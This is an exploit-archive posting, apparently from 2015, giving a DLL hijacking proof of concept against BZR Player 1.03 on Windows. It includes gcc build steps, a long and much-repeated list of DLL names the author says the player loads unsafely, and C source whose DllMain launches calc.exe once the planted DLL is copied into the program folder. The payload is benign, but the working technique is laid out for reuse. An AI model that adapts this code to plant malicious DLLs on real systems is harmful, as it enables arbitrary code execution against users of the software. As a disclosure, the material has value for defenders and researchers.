Home / os / wins2003

BZR Player 1.03 DLL Hijacking

Posted on 31 March 2015

/* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: BZR Player 1.03 DLL Hijacking #[+] Date: 29-03-2015 #[+] Type: Local Exploits #[+] Vendor: http://bzrplayer.blazer.nu/ #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o [DLLNAME_choose one from the lis below].dll tcyber.c # Copy it to the software dir. then execute the software , calc.exe will launch :). #Vulnerable and Exploitable DLLs: output_dsound.dll codec_cdda.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_fsb.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_vag.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll codec_.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll codec_oggvorbis.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tremor.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_aiff.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll codec_flac.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll codec_mod.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll codec_s3m.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll output_winmm.dll codec_xm.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll codec_midi.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll codec_dls.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll output_wasapi.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll output_asio.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_writer.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll output_writer_nrt.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll output_nosound.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll output_nosound_nrt.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll codec_tag.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll #Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; }

 

TOP